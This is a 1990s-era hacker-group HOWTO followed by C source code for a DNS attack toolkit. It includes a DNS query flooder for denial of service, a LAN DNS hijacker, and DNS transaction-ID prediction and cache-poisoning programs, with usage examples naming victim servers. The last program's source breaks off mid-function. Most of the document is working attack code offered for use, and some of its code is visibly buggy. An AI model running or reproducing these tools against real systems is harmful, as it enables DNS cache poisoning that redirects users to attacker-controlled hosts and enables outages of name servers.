Special Thanks to: ackboo and Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability.

/* I'm a w00w00ify'd w00c0w */


Here is a HOWTO on the w00w00 ID tools:
----[HOWTO]----

I've decided to make a little HOWTO because the w00w00 ID tools are not
very user friendly for a beginner :)

1: WSD-baddns
WSD-baddns is a program to destroy the DNS.

It's very, very simple to use !!! :)

/* I'm a w00w00ify'd w00c0w */

Usage: WSD-baddns <victim>
Example: WSD-baddns bob.lenet.fr



2: WSDsniffID
WSDsniffID is a DNS hijacker. You need to have root privileges. It's
for a LAN only :)

Usage:
WSDsniffID <device> <spoof IP> <spoof NAME> [type 1 or 12 ]

'' by type we mean 1 = TYPE A 12 = TYPE PTR ''

Example:
WSDsniffID eth0 31.3.3.7 www.i.m.mucho.horny.ya 12 (We are hijacking a PTR)

So now if someone runs "
nslookup <one ip>" on a network they have:

[root@w00w00 w0w0w]# nslookup 1.2.3.4
Server: localhost
Address: 127.0.0.1

Name: www.i.m.mucho.horny.ya
Address: 1.2.3.4



3: --= WSDspoofID =--

1) Before you need root on a NS with AUTH over a domain (for example
shok.janova.org has authority over *.janova.org)

WSDspoofID is a DNS ID predictor (but you need to have root on a NS or
you need to the privileges to sniff the NS)

Usage:
WSDspoofID <device to spoof> <NS victim> <your domain> <ip of your dns>
<type (1,12)> <spoof name> <spoof ip> <ns with auth on spoof ip or name>

Example:
WSDspoofID ppp0 NS2.MCI.NET janova.org shok.janova.org 12
www.i.m.ereet.ya 194.206.23.123 ns2.provnet.fr ..


Well after that when you ask NS2.MCI.NET for 194.206.23.123 you have:

[root@w00w00 w0w0w]# nslookup 194.206.23.123 ns2.mci.net
Server: ns2.mci.net
Address: 204.70.57.242

Name: www.i.m.ereet.ya
Address: 194.206.23.123

[root@w00w00 w0w0w]#

We will use ns2.provnet.fr because ns2.provnet.fr has AUTH on 194.206.23.*

To find out who has AUTH on 194.206.23.*, you just need to do the
following:

[root@w00w00 w0w0w]# host -t NS 23.206.194.in-addr.arpa
23.206.194.in-addr.arpa name server NS2.PROVNET.FR
23.206.194.in-addr.arpa name server BOW.RAIN.FR
23.206.194.in-addr.arpa name server NS1.PROVNET.FR
[root@w00w00 w0w0w]#

To find out the NS who haas AUTH on, for example, *.provnet.fr:

[root@w00w00 w0w0w]# host -t NS provnet.fr
provnet.fr name server NS1.provnet.fr
provnet.fr name server BOW.RAIN.fr
provnet.fr name server NS2.provnet.fr
[root@w00w00 w0w0w]#

Note: The entry can change!!! You can get NS1 first.


Here is the source... to our programs

----[ BUGS ]----
1: The bit field on Solaris causes a bus error..
We will fix it soon
----[END of BUGS ]----


----[WSD-spoof.c]----
/* ******************************************************************** */
/* w00w00 functions for spoofing UDP */
/* ------------------------------------------------------------------- */
/* w00w00 Security Development (WSD) */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************************** */

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>
#include <string.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "
ip.h"
#include "
udp.h"

#define IPHDRSIZE sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)

/*****************************************************************************/
/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/
/*****************************************************************************/

unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}

/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);

}



int udp_send(s, saddr, daddr, sport, dport, datagram, datasize)
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char *datagram;
unsigned datasize;
{

int x;

unsigned char *data;
unsigned char packet[4024];

struct iphdr *ip;
struct udphdr *udp;
struct sockaddr_in sin;


ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+IPHDRSIZE);
data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);

memset(packet, 0, sizeof(packet));

udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(UDPHDRSIZE+datasize);
udp->check = 0;

memcpy(data, datagram, datasize);
memset(packet, 0, IPHDRSIZE);

ip->saddr.s_addr = saddr;
ip->daddr.s_addr = daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->id = random() % 5985 + 1;
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet, IPHDRSIZE);

sin.sin_family = AF_INET;
sin.sin_addr.s_addr=daddr;
sin.sin_port = udp->dest;

x = sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));

return(x);
}



/*****************************************************************************/
/* RECV PAKET */
/* get_pkt(socket, *buffer, size of the buffer); */
/*****************************************************************************/

int get_pkt(s, data, size)
int s;
unsigned char *data;
int size;
{
struct sockaddr_in sin;
int len, resu;

len = sizeof(sin);
resu = recvfrom(s, data, size, 0, (struct sockaddr *)&sin, &len);

return resu;
}
----[END of WSD-spoof.c]----


----[WSD-DNS2.c]----
/* ****************************************************** */
/* w00w00 code for DNS packets Super Raw */
/* ------------------------------------------------------ */
/* w00w00 Security Development (WSD) */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ****************************************************** */

#define ERROR -1
#define TYPE_A 1
#define TYPE_PTR 12
#define MAXLEN 64
#define DNSHDRSIZE 12

int myrand()
{
int j = 1 + (int)(150.0 * rand() / (RAND_MAX + 1.0));
return(j);
}


unsigned long host2ip(char *serv)
{
struct hostent *hent;
struct sockaddr_in sinn;

hent = gethostbyname(serv);
if (hent == NULL) {
herror("
gethostbyname");
exit(ERROR);
}

bzero((char *)&sinn, sizeof(sinn));
bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);

return sinn.sin_addr.s_addr;
}



void nameformat(char *name, char *qs)
{
int i;
int a = 0;

char lol[3000];
char tmp[2550], tmp2[2550];

if (strlen(name) > sizeof(tmp) - 1) {
fprintf(stderr, "
nameformat(): name too long: %s\n", name);
exit(ERROR);
}

bzero(lol, sizeof(lol));
bzero(tmp, sizeof(tmp));
bzero(tmp2, sizeof(tmp2));

for (i = 0; i < strlen(name); i++) {
if (*(name+i) == '.') {
sprintf(tmp2, "
%c%s", a, tmp);
strcat(lol, tmp2);

bzero(tmp, sizeof(tmp));
bzero(tmp2, sizeof(tmp2));

a = 0;
} else
tmp[a++] = *(name+i);
}

sprintf(tmp2, "
%c%s", a, tmp);

strcat(lol, tmp2);
strcpy(qs, lol);
}

void nameformatIP(char *ip, char *resu)
{
int i, a = 3, k = 0;

char c;
char *A[4];
char nameform[256];
char tmp[256], tmp1[256];
char *arpa = "
in-addr.arpa";

if (strlen(ip) > sizeof(nameform) - 1) {
fprintf(stderr, "
nameformatIP(): name too long: %s\n", ip);
exit(ERROR);
}

bzero(tmp, sizeof(tmp));
bzero(tmp1, sizeof(tmp1));
bzero(nameform, sizeof(nameform));

for (i = 0; i < 4; i++) {
A[i] = (char *)malloc(4);
if (A[i] == NULL) {
perror("
malloc");
exit(ERROR);
}

bzero(A[i], 4);
}

bzero(tmp, sizeof(tmp));
bzero(tmp1, sizeof(tmp1));

for (i = 0; i < strlen(ip); i++) {
c = ip[i];
if (c == '.') {
strcat(A[a], tmp);
a--;

k = 0;

bzero(tmp, sizeof(tmp));
} else tmp[k++] = c;
}

strcat(A[a], tmp);

for (i = 0; i < 4; i++) {
strcat(tmp1, A[i]);
strcat(tmp1, "
.");
}


strcat(tmp1, arpa);
nameformat(tmp1, nameform);
strcpy(resu, nameform);
}


int makepacketQS(char *data, char *name, int type)
{
if (type == TYPE_A) {
nameformat(name, data);
*((u_short *) (data+strlen(data)+1)) = htons(TYPE_A);
}

if (type == TYPE_PTR) {
nameformatIP(name,data);
*((u_short *) (data+strlen(data)+1)) = htons(TYPE_PTR);
}

*((u_short *) (data+strlen(data)+3)) = htons(1);

return(strlen(data)+5);
}


int makepacketAW(char *data, char *name, char *ip, int type)
{
int i;
char tmp[2550];

bzero(tmp, sizeof(tmp));

if (type == TYPE_A) {
nameformat(name, data);
*((u_short *) (data+strlen(data)+1)) = htons(1);
*((u_short *) (data+strlen(data)+3)) = htons(1);

i = strlen(data)+5;
strncpy(data+i, data, MAXLEN);

i = i+strlen(data)+1;
*((u_short *) (data+i)) = htons(TYPE_A);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(4);
*((u_long *) (data+i+10)) = host2ip(ip);

return(i+14);
}

if (type == TYPE_PTR) {
nameformat(name, tmp);
nameformatIP(ip, data);

*((u_short *) (data+strlen(data)+1)) = htons(TYPE_PTR);
*((u_short *) (data+strlen(data)+3)) = htons(1);

i = strlen(data)+5;
strncpy((data+i), data, MAXLEN);

i = (i+strlen(data)+1);
*((u_short *) (data+i)) = htons(TYPE_PTR);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(strlen(tmp)+1);

strncpy((data+i+10), tmp, MAXLEN);

return(i+10+strlen(tmp)+1);
}

/* You were only supposed to use type A or PTR! Bad people. */
return(ERROR);
}

void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
{
int i;
int on=1;
int sraw;

char *data;
char buff[1024];

struct dnshdr *dns;

sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("
socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("
setsockopt");
exit(ERROR);
}

dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);

bzero(buff, sizeof(buff));

dns->id = 6000+myrand();
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);

i = makepacketQS(data, name, type);
udp_send(sraw, s_ip, d_ip, 1200+myrand, 53, buff, DNSHDRSIZE+i);

close(sraw);
}

void sendanswer(s_ip, d_ip, name, spoofip, ID, type)
u_long s_ip;
u_long d_ip;
char *name;
char *spoofip;
int ID;
int type;
{
int i;
int on=1;
int sraw;

char *data;
char buff[1024];

struct dnshdr *dns;


sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("
socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("
setsockopt");
exit(ERROR);
}

dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);

bzero(buff, sizeof(buff));

dns->id = htons(ID);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);

i = makepacketAW(data, name, spoofip, type);
udp_send(sraw, s_ip, d_ip, 53, 53, buff, DNSHDRSIZE+i);

close(sraw);
}


void dnsspoof(dnstrust, victim, spoofname, spoofip, ID, type)
char *dnstrust;
char *victim;
char *spoofname;
char *spoofip;
int ID;
int type;
{
int loop, rere;
u_long fakeip, trustip, victimip;

char *data;
char buff[1024];

struct dnshdr *dns;


dns = (struct dnshdr *)buff;
data = (char *)(buff+DNSHDRSIZE);

trustip = host2ip(dnstrust);
victimip = host2ip(victim);
fakeip = host2ip("
12.1.1.0");

/* send question ... */
if (type == TYPE_PTR)
for (loop = 0; loop < 4; loop++)
sendquestion(fakeip, victimip, spoofip, type);

if (type == TYPE_A)
for (loop = 0; loop < 4; loop++)
sendquestion(fakeip, victimip, spoofname, type);

/* Answer quickly! */
for (rere = 0; rere < 2; rere++)
for (loop = 0; loop < 80; loop++) {
printf("
trustip: %s, vitcimip: %s, spoofname: %s, spoofip: %s,"
"
ID: %i, type: %i\n",
dnstrust, victim, spoofname, spoofip, ID+loop, type);

sendanswer(trustip, victimip, spoofname, spoofip, ID+loop, type);

}
}
----[END of WSD-DNS2.c]----



----[WSD-baddns.c ]----
/* ******************************************************* */
/* w00w00 DNS attack (Denial of Service) */
/* w00w00 Security Development (WSD) */
/* ------------------------------------------------------- */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include "
WSD-spoof.c"
#include "
dns.h"
#include "
WSD-DNS2.c"

#define ERROR -1
#define VERSION "
v0.2"
#define DNSHDRSIZE 12

void main(int argc, char **argv)
{
int sraw, on = 1;
unsigned long s_ip, d_ip;

char *data;
char buf[4000];

unsigned char names[255];

struct dnshdr *dns;

printf("
w00w00!\n");

if (argc < 2) {
printf("
Usage: %s <host>\n", argv[0]);
printf("
w00w00 DNS Attack - WSD@w00w00.org\n");
exit(0);
}

dns = (struct dnshdr *)buf;
data = (char *)(buf+12);
bzero(buf, sizeof(buf));

sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("
socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("
setsockopt");
exit(ERROR);
}

printf("
WSD-baddns %s: DNS attack - w00w00 Security Development (WSD)\n",
VERSION);

sleep(1);

s_ip = host2ip("
100.1.2.3");
d_ip = host2ip(argv[1]);

dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);

while(1) {
sprintf(names, "
\3%d\3%d\3%d\3%d\07in-addr\04arpa",
myrand(), myrand(), myrand(), myrand());

printf("
%s\n", names);
strcpy(data, names);

*((u_short *) (data+strlen(names)+1)) = ntohs(12);
*((u_short *) (data+strlen(names)+3)) = ntohs(1);

udp_send(sraw, s_ip, d_ip, 2600+myrand(), 53, buf, 14+strlen(names)+5);

s_ip = ntohl(s_ip);
s_ip++;
s_ip = htonl(s_ip);

}
}
----[END of WSD-baddns.c]----



----[WSDkillDNS.c ]----
/* *********************************************** */
/* w00w00 DNS Killer (Brutal attack) */
/* ----------------------------------------------- */
/* Email: WSD@w00w00.org */
/* WWW: http://www.w00w00.org */
/* FTP: ftp://ftp.w00w00.org/pub */
/* *********************************************** */

#include "
WSD-spoof.c"
#include "
dns.h"
#include "
WSD-DNS2.c"

#define ERROR -1
#define ID_START 1
#define ID_STOP 65535
#define VERSION "
v0.3"
#define PORT_START 53
#define PORT_STOP 54

void main(int argc, char **argv)
{
struct dnshdr *dns;

char *data;
char buffer2[4000];
unsigned char names[255];

unsigned long s_ip, s_ip2;
unsigned long d_ip, d_ip2;

int sraw, i, on=1, x, loop;
int idstart, idstop, portstart, portstop;

printf("
w00w00!\n");
printf("
w00w00 Security Development (WSD)\n");
printf("
WSD@w00w00.org\n");

if (argc < 5) {
system("
/usr/bin/clear");

printf("
w00w00!\n");
printf("
w00w00 Security Development (WSD)\n");
printf("
WSD@w00w00.org\n\n");
printf("
Usage : %s <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]);
printf("
ip src: ip source of the dns anwser\n");
printf("
ip dst: ip of the dns victim\n");
printf("
name : spoof name i.e.: www.dede.com\n");
printf("
ip : the ip associated with the name\n");
printf("
options:\n");
printf("
[A,B,N]...\n");
printf("
A: flood the DNS victim with multiple queries\n");
printf("
B: DoS attack to crash the DNS\n");
printf("
N: No attacks\n\n");
printf("
[ID_START] \n");
printf("
ID_START: id start :> \n\n");
printf("
[ID_STOP] n");
printf("
ID_STOP : id stop :> \n\n");
printf("
PORT START, PORT STOP: send the spoof to the portstart at portstop\n\n");

exit(ERROR);
}

dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2, sizeof(buffer2));

sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("
socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR){
perror("
setsockopt");
exit(ERROR);
}

printf("
WSDkillDNS %s \n", VERSION);

s_ip2 = s_ip = host2ip(argv[1]);
d_ip2 = d_ip = host2ip(argv[2]);


if (argc > 5)
if (*argv[5]=='A')
for (loop=0; loop < 10; loop++) {
dns->id = 6000+loop;
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);

i = makepacketQS(data, argv[3], TYPE_A);
udp_send(sraw, s_ip, d_ip, 1200+loop, 53, buffer2, DNSHDRSIZE+i);

s_ip = ntohl(s_ip);
s_ip++;
s_ip = htonl(s_ip);

}

if (argc > 5)
if (*argv[5]=='B') {
s_ip = host2ip("
100.1.2.3");

dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);

printf("
Enter the number of packets to send: ");
scanf("
%d",&i);

for (x = 0; x < i; x++) {
sprintf(names, "
\3%d\3%d\3%d\3%d\07in-addr\04arpa",
myrand(), myrand(), myrand(), myrand());

strcpy(data, names);

*((u_short *) (data+strlen(names)+1)) = ntohs(12);
*((u_short *) (data+strlen(names)+3)) = ntohs(1);

udp_send(sraw, s_ip, d_ip, 2600+myrand(), 53, buffer2,
14+strlen(names)+5);

s_ip = ntohl(s_ip);
s_ip++;
s_ip = htonl(s_ip);

printf("
send packet # %i:%i\n", x, i);
}
}

if (argc > 6) idstart = atoi(argv[6]);
else idstart = ID_START;

if (argc > 7) idstop = atoi(argv[7]);
else idstop = ID_STOP;

if (argc > 8) {
portstart = atoi(argv[8]);
portstop = atoi(argv[9]);
} else {
portstart = PORT_START;
portstop = PORT_STOP;
}


bzero(buffer2, sizeof(buffer2));
bzero(names, sizeof(names));

i = 0 , x = 0;
s_ip = s_ip2, d_ip = d_ip2;

for (; idstart < idstop; idstart++) {
dns->id = htons(idstart);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);

(void) printf("
send awnser with id %i to port %i at port %i\n",
idstart, portstart, portstop);

i = makepacketAW(data, argv[3], argv[4], TYPE_A);

for (; x < portstop; x++)
udp_send(sraw, s_ip, d_ip, 53, x, buffer2, DNSHDRSIZE+i);

x = portstart;
}

printf("
terminated..\n");
}
----[END of WSDkillDNS.c ]----


----[WSD-IDpred.c ]----
/* ******************************************************* */
/* w00w00 DNS ID Predictor Super Raw */
/* ------------------------------------------------------- */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include <fcntl.h>
#include "
dns.h"
#include "
WSD-spoof.c"
#include "
WSD-DNS2.c"

#define ERROR -1
#define DNSHDRSIZE 12
#define TIMEOUT 300
#define VERSION "
v0.7"
#define SPOOFIP "
4.4.4.4"
#define UNDASPOOF "
111.111.111.111"
#define LEN sizeof(struct sockaddr)


void usage()
{
printf("
w00w00 DNS ID Predictor\n");
printf("
w00w00 Security Development (WSD)\n");
printf("
WSD@w00w00.org\n");

printf("
WSD-idpred <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n");
printf("
\n Ex: WSD-idpred ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
printf("
We are going to poison ns.victim.com so they resolve mouhhahaha.hol.fr in 31.3.3.7\n");
printf("
We use provnet.fr and ns1.provnet for finding the ID of ns.victim.com\n");
printf("
We use ns.isdnet.net for spoofing because they have AUTH on *.hol.fr\n");
printf("
For more information check ftp.w00w00.org/pub/DNS/\n");
printf("
Mail WSD@w00w00.org.\n");

exit(ERROR);
}

void senddnspkt(s, d_ip, wwwname, ip, dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
int i;

char buffer[1024];
char *data = (char *)(buffer+DNSHDRSIZE);

struct sockaddr_in sin;

bzero(buffer, sizeof(buffer));
memcpy(buffer, dns, DNSHDRSIZE);

if (dns->qr == 0) {
i = makepacketQS(data, wwwname, TYPE_A);
sin.sin_family = AF_INET;
sin.sin_port = htons(53);
sin.sin_addr.s_addr = d_ip;
sendto(s, buffer, DNSHDRSIZE+i, 0, (struct sockaddr *)&sin, LEN);
} else {
i = makepacketAW(data, wwwname, ip, TYPE_A);
sin.sin_family = AF_INET;
sin.sin_port = htons(53);
sin.sin_addr.s_addr = d_ip;
sendto(s, buffer, DNSHDRSIZE+i, 0, (struct sockaddr *)&sin, LEN);
}

}

void dns_qs_no_rd(s, d_ip, wwwname, ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
int i;

char *data;
char buffer[1024];

struct dnshdr *dns;

dns = (struct dnshdr *)buffer;
data = (char *)(buffer+DNSHDRSIZE);

bzero(buffer, sizeof(buffer));

dns->id = htons(ID);
dns->qr = 0;
dns->rd = 0; /* dont want the recursion !! */
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);

i = makepacketQS(data, wwwname, TYPE_A);
senddnspkt(s, d_ip, wwwname, NULL, dns);
}

void main(int argc, char **argv)
{
struct sockaddr_in sin_rcp;
struct dnshdr *dns, *dns_recv;

int len = sizeof(struct sockaddr);
int sraw, s_r, i, on = 1, x, ID, times;

char *alacon;
char host[256];
char dnstrust[256];
char *data, *data2;
char buf[4000], buf1[4000];
char spoofname[256], spoofip[256];

unsigned char fakename

  
[256];
unsigned char names[256];
unsigned long s_ip, s_ip2;
unsigned long d_ip, d_ip2, trust;
unsigned int DA_ID = 65535, loop = 65535;


dns_recv = (struct dnshdr *)(buf1);
data2 = (char *)(buf1+DNSHDRSIZE);
dns = (struct dnshdr *)buf;
data = (char *)(buf+DNSHDRSIZE);

bzero(buf, sizeof(buf));
srand(time(NULL));

printf("w00w00 DNS ID Predictor\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");

s_r = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s_r == ERROR) {
perror("socket");
exit(ERROR);
}

if ((fcntl(s_r, F_SETFL, O_NONBLOCK)) == ERROR) {
perror("fcntl");
exit(ERROR);
}

sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))
== ERROR)) {
perror("setsockopt");
exit(ERROR);
}

if (argc < 2) usage();
if (argc > 9) DA_ID = loop = atoi(argv[9]);
if (argc > 6) {
if (strlen(argv[6]) > sizeof(spoofname) - 1) {
fprintf(stderr, "argv[6] too long: %s\n", argv[6]);
exit(ERROR);
} else
strcpy(spoofname, argv[6]);
} else {
printf("Enter the name you want spoof: ");
scanf("%255s", spoofname);
}

if (argc > 7) strncpy (host, argv[7], sizeof(host));
else {
printf("Enter the IP address of the spoof name: ");
scanf("%255s", host);
}

alacon = (char *)inet_ntoa(host2ip(host));
strcpy(spoofip, alacon);

if (argc > 8) {
if (strlen(argv[8]) > sizeof(host) - 1) {
fprintf(stderr, "argv[8] too long: %s\n", argv[8]);
exit(ERROR);
} else
strcpy(host, argv[8]);
} else {
printf("Enter the trusted NS of the victim: ");
scanf("%255s", host);
}

alacon = (char *)inet_ntoa(host2ip(host));
strcpy(dnstrust, alacon);

printf("WSD-IDpred %s w00w00 (WSD) - Super Raw\n", VERSION);

/* save some arguments */
s_ip2 = host2ip(argv[1]);
trust = host2ip(argv[2]);
s_ip = host2ip(UNDASPOOF);
d_ip2 = d_ip = host2ip(argv[4]);

if (strlen(argv[3]) > sizeof(fakename) - 1) {
fprintf(stderr, "argv[3] too long: %s\n", argv[3]);
exit(ERROR);
}

while(1) {
sprintf(fakename, "%d%d%d%d%d%d.%s", myrand(), myrand(), myrand(),
myrand(), myrand(), myrand(), argv[3]);

sendquestion(s_ip, d_ip, fakename, TYPE_A);

/* end of question packet */
bzero(buf, sizeof(buf)); /* re-init some variable */
bzero(names, sizeof(names));

i = 0, x = 0;

/* Here we start the spoof anwser */
ID = loop;
for (; loop >= ID-10; loop--) {
dns->id = htons(loop);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);

i = makepacketAW(data, fakename, SPOOFIP, TYPE_A);
udp_send(sraw, trust, d_ip2, 53, 53, buf, DNSHDRSIZE+i);
}

bzero(buf, sizeof(buf)); /* re-init some variable */
bzero(names, sizeof(names));
i = 0, x = 0;

/* Time for the test spoof */

/* Here we sending question, nonrecursive */
dns_qs_no_rd(s_r, d_ip2, fakename, myrand());

/* We are waiting for answer ... */
while (1) {
for (times = 0; times < TIMEOUT; times++) {
if (recvfrom(s_r, buf1, sizeof(buf1), 0,
(struct sockaddr *)&sin_rcp,&len) != ERROR) {
printf("We have the response.\n");
times = 0;
break;
}

usleep(10);
times++;
}

if (times != 0) {
printf("We have no response from the NS. Resend question..\n");
dns_qs_no_rd(s_r, d_ip2, fakename, myrand());
} else break;
}

/* Okay we have an answer */
printf("fakename = %s\n", fakename);

if (sin_rcp.sin_addr.s_addr == d_ip2)
if (sin_rcp.sin_port == htons(53))
if (dns_recv->qr == 1) {
if (dns_recv->rep_num == 0) /* We dont have the right ID */
printf("Try %d < ID < %d\n", ID-10, ID);

else {
/* The spoof has worked, we have found the right ID! */
printf("the DNS ID of %s is %d < ID < %d!!\n",
argv[4], loop-10, loop);

printf("Let's send the spoof...\n");
dnsspoof(dnstrust, argv[4], spoofname, spoofip, loop,
atoi(argv[5]));
printf("spoof sent...\n");

exit(0);
}
}

bzero(buf1, sizeof(buf1));

}

}
----[END of WSD-IDpred.c]----

----[ WSDspoofID.c ]----
/* ******************************************************* */
/* w00w00 DNS ID Spoofer Super Raw */
/* w00w00 Security Development (WSD) */
/* ------------------------------------------------------- */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"
#include <pcap.h>
#include <net/if.h>

#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "v0.6"
#define SPOOF "127.0.0.1"

int ETHHDRSIZE;

void main(int argc, char **argv)
{
int sraw, i, on=1, con, ID, DA_ID, type;

struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv, *dnssend;

struct pcap *pcap_d;
struct pcap_pkthdr h;

char *buf;
char *alacon;
char host[256];
char ebuf[256];
char buf1[1024];
char namefake[256];
char dnstrust[256];
char *data, *data2;
char spoofip[256], spoofname[256];

unsigned long d_ip;
unsigned long s_ipns;


srand((time(NULL) % random() * random()));


printf("w00w00 DNS ID Spoofer - Super Raw!\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");

if (argc < 2) {
printf("Usage: %s <device> <ns.victim.com> <your domain> <IP of your NS> <type 1,12> <spoofname> <spoof ip> <ns trust>\n",argv[0]);
printf("Example: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr\n",argv[0]);
printf(" So... we try to poison victim.com with type 12 (PTR). Now, if someone asked for the ip of mail.provnet.fr they will resolve to damn.diz.ip.iz.ereet.ya\n");

exit(1);
}

if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;

if (argc > 5) type = atoi(argv[5]);
if (argc > 6) {
if (strlen(argv[6]) > sizeof(spoofname) - 1) {
fprintf(stderr, "argv[6] too long: %s\n", argv[6]);
exit(ERROR);
} else
strcpy(spoofname, argv[6]);
} else {
printf("Enter the name you want to spoof: ");
scanf("%255s", spoofname);
}

if (argc > 7) {
if (strlen(argv[7]) > sizeof(host) - 1) {
fprintf(stderr, "argv[7] too long: %s\n", argv[7]);
exit(ERROR);
} else
strcpy(host, argv[7]);
} else {
printf("Enter the IP of the name to spoof: ");
scanf("%255s", host);
}

alacon = (char *)inet_ntoa(host2ip(host));
strcpy(spoofip, alacon);

if (argc > 8) strncpy (host, argv[8], sizeof(host));
else {
printf("Enter the trusted dns for the spoof: ");
scanf("%255s", host);
}

alacon = (char *)inet_ntoa(host2ip(host));
strcpy(dnstrust, alacon);

dnssend = (struct dnshdr *)buf1;
data2 = (char *)(buf1+DNSHDRSIZE);

bzero(buf1, sizeof(buf1));

sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}

if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}

printf("WSDspoofID.c %s w00w00 ID sniffer\n", VERSION);
printf("w00w00 Security Development\n");
sleep(1);

pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);

s_ipns = host2ip(argv[4]);
d_ip = host2ip(argv[2]);
con = myrand();

/* Make the question to get the ID */

sprintf(namefake, "%d%d%d.%s", myrand(), myrand(), myrand(), argv[3]);

dnssend->id = 2600;
dnssend->qr = 0;
dnssend->rd = 1;
dnssend->aa = 0;
